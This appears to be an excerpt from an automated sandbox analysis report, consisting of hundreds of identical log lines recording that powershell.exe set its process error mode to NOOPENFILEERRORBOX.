                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
